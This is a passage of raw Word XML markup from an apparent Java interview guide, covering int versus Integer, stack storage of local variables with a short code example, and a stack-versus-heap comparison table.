      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="41754644" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68B216E0"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emory Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13248E15"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4 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6B7505"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re (object overhead)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="2C9E9AD0" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B156583"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ull Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE41F05"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6086C0C8"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="31D86357" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BA5F574"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in Collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C63F75"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Not allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387D1697"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Allowed (List&lt;Integer&gt;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="28CEB1DB" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5567DB31"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uto-boxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C50D7CC"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14735D4B" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">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Yes (can convert from int)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C89ED76" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0079106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373A685">
          <v:rect id="_x0000_i1271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267859B" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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en to use what?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D7EED" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:num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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for performance &amp; simple numeric logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B0810" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:num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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections</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nulls</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Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like in generics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F12FF7" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CC7E8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6C7DDBE">
          <v:rect id="_x0000_i1272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7AA0A" w14:textId="77777777" w:rsidR="004043D8" w:rsidRPr="00CE4B95" w:rsidRDefault="004043D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc196307579"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where local variables are stored in memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="55D1A4A9" w14:textId="24773720" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">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Local variables in Java are stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here's a detailed explanation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6D743" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0056435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1A78674">
          <v:rect id="_x0000_i1273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D0673" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ere Are Local Variables Stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D2CD8" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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tack Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DFD62" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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Local variables (like method parameters or variables declared inside methods) are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E8B2C" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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Each method call creates a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and local variables are created inside that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDC01F" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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the method finishes, its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack frame is removed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and local variables go out of scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D203463" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0056435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DDE27E">
          <v:rect id="_x0000_i1274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17868C9D" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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1FCD23ED" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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emoryExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7FA1D" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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2D72FB29" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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int a = 10; // Local variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A1875" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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str = "Hello"; // Local reference variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1728FBB3" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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Object obj = new MyObject(); // Local reference to object in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CC88A" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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EB606B1" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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82B5C62" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328422A0" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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MyObject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123113E4" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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x = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4DB67" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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3F20CDC" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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primitive) → stored directly in stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E412F0" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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r → reference in stack, "Hello" (String literal) is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (heap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B751D0" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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bj → reference in stack, object itself is created in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA5D1F" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0056435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546B7CB">
          <v:rect id="_x0000_i1275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50634FD1" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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tack vs Hea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7"/>
        <w:gridCol w:w="2612"/>
        <w:gridCol w:w="2661"/>
      </w:tblGrid>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="5E5B4901" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF9F1CD" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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6BBDF606" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719438FD" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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eap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="4FAE6944" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F0C9862" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513ECC74" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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cal variables, method calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71366ADC" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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bjects, class instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="6829F8F2" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71092C8B" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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emory allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FEBE58" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52D8F488" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="543679B2" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D403934" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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fespan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DF38D7" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ill method execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75944560" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ill no reference (GC eligible)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="2DB4D82F" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48E78B63" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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read safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75DB3A1D" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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ch thread has its own</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765172FA" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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hared among all threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F13BD6" w14:textId="7F9A9993" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00051BE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3BFD4DB3">
          <v:rect id="_x0000_i1276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFFACC" w14:textId="77777777" w:rsidR="004043D8" w:rsidRPr="00CE4B95" w:rsidRDefault="004043D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc196307580"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where objects will be stored in memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="669BB901" w14:textId="4F85AE6D" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
